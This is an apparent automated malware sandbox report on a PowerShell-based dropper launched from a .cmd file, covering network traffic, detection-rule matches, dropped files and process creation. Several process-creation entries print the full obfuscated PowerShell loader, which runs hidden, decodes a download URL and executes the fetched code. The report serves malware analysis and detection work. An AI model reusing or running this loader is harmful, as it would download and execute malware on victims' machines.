Source: powershell.exe, 00000002.00000002.2443831319.000001CB1C23D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2443831319.000001CB1D954000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com
Source: wab.exe, 0000000A.00000002.2744457018.0000000008078000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/
Source: wab.exe, 0000000A.00000002.2744948578.0000000008220000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2744457018.00000000080B7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2232376663.00000000080E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/6v0noo
Source: wab.exe, 0000000A.00000002.2744457018.00000000080B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/6v0noo)
Source: wab.exe, 0000000A.00000003.2232376663.00000000080E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/6v0nooBc
Source: powershell.exe, 00000002.00000002.2443831319.000001CB1C23D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/uq21t8P
Source: powershell.exe, 00000005.00000002.2256558573.000000000484C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/uq21t8XR
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 50720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50719
Source: unknown Network traffic detected: HTTP traffic on port 50719 -> 443
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.28.80:443 -> 192.168.2.4:50719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:50720 version: TLS 1.2

System Summary

Source: amsi32_7236.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7152, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7236, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6468
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6492
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B88AB16 2_2_00007FFD9B88AB16
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B88B8C2 2_2_00007FFD9B88B8C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B954049 2_2_00007FFD9B954049
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02AAE928 5_2_02AAE928
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02AAF1F8 5_2_02AAF1F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_02AAE5E0 5_2_02AAE5E0
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe 4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: Resource name: RT_GROUP_ICON type: COM executable for DOS
Source: msoadfsb.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: msoasb.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver\262B)
Source: msoasb.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate32.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: AppVDllSurrogate64.exe.10.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: AppVLP.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Integrator.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: officeappguardwin32.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: officeappguardwin32.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: OfficeScrSanBroker.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.10.dr Static PE information: Resource name: RT_ICON type: 68k Blit mpx/mux executable
Source: OfficeScrSanBroker.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: MpCmdRun.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: MpDlpCmd.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: UcMapi.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: UcMapi.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: UcMapi.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver p\327G\200<)
Source: VC_redist.x64.exe.10.dr Static PE information: Resource name: RT_ICON type: VAX-order 68K Blit (standalone) executable
Source: integrator.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Au3Check.exe.10.dr Static PE information: Resource name: RT_GROUP_ICON type: DOS executable (COM, 0x8C-variant)
Source: Aut2exe.exe.10.dr Static PE information: Resource name: RT_ICON type: 370 XA sysV executable not stripped - version 6657 - 5.2 format
Source: Aut2exe_x64.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: ai.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: ai.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: ai.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: ai.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: ai.exe0.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver \240\357E)
Source: upx.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: SciTE.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Uninstall.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: AdobeARMHelper.exe.10.dr Static PE information: Resource name: RT_ICON type: PDP-11 pure executable - version 69
Source: AdobeARMHelper.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AdobeARMHelper.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jaureg.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: jucheck.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jucheck.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jusched.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jusched.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OLicenseHeartbeat.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: grv_icons.exe.10.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: java.exe.10.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: javaw.exe.10.dr Static PE information: Resource name: RT_ICON type: DitPack archive data
Source: misc.exe.10.dr Static PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\377"
Source: misc.exe.10.dr Static PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\377"
Source: OcPubMgr.exe.10.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: AppVDllSurrogate64.exe.10.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: PerfBoost.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: armsvc.exe.10.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate.exe.10.dr Static PE information: Data appended to the last section found
Source: Au3Check.exe.10.dr Static PE information: Data appended to the last section found
Source: javaw.exe.10.dr Static PE information: Data appended to the last section found
Source: Au3Info_x64.exe.10.dr Static PE information: Data appended to the last section found
Source: MicrosoftEdgeUpdateOnDemand.exe.10.dr Static PE information: Data appended to the last section found
Source: AutoIt3Help.exe.10.dr Static PE information: Data appended to the last section found
Source: aimgr.exe0.10.dr Static PE information: Data appended to the last section found
Source: AppSharingHookController.exe.10.dr Static PE information: Data appended to the last section found
Source: Microsoft.Mashup.Container.Loader.exe.10.dr Static PE information: Data appended to the last section found
Source: MpDlpCmd.exe.10.dr Static PE information: Data appended to the last section found
Source: dbcicons.exe.10.dr Static PE information: Data appended to the last section found
Source: Uninstall.exe.10.dr Static PE information: Data appended to the last section found
Source: chrome.exe.10.dr Static PE information: Data appended to the last section found
Source: ConfigSecurityPolicy.exe.10.dr Static PE information: Data appended to the last section found
Source: MpCopyAccelerator.exe.10.dr Static PE information: Data appended to the last section found
Source: Au3Info.exe.10.dr Static PE information: Data appended to the last section found
Source: SQLDumper.exe.10.dr Static PE information: Data appended to the last section found
Source: Wordconv.exe.10.dr Static PE information: Data appended to the last section found
Source: msoasb.exe.10.dr Static PE information: Data appended to the last section found
Source: AppSharingHookController64.exe.10.dr Static PE information: Data appended to the last section found
Source: AppVLP.exe.10.dr Static PE information: Data appended to the last section found
Source: grv_icons.exe.10.dr Static PE information: Data appended to the last section found
Source: AdobeARMHelper.exe.10.dr Static PE information: Data appended to the last section found
Source: SDXHelper.exe.10.dr Static PE information: Data appended to the last section found
Source: msoev.exe.10.dr Static PE information: Data appended to the last section found
Source: upx.exe.10.dr Static PE information: Data appended to the last section found
Source: MsMpEng.exe.10.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate64.exe.10.dr Static PE information: Data appended to the last section found
Source: PerfBoost.exe.10.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate32.exe.10.dr Static PE information: Data appended to the last section found
Source: aimgr.exe.10.dr Static PE information: Data appended to the last section found
Source: java.exe.10.dr Static PE information: Data appended to the last section found
Source: VSTOInstaller.exe.10.dr Static PE information: Data appended to the last section found
Source: amsi32_7236.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7152, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7236, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: MicrosoftEdgeUpdateSetup.exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.0107421875
Source: VC_redist.x64.exe.10.dr Static PE information: Section: .reloc ZLIB complexity 1.0107421875
Source: classification engine Classification label: mal100.spre.troj.evad.winCMD@14/164@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Bridgewards.Hal
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1236:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cefbqc1w.cfa.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7152
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7236
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini 
,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.m
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda 
IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Ove
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini 
,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.m Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t" Jump to behavior
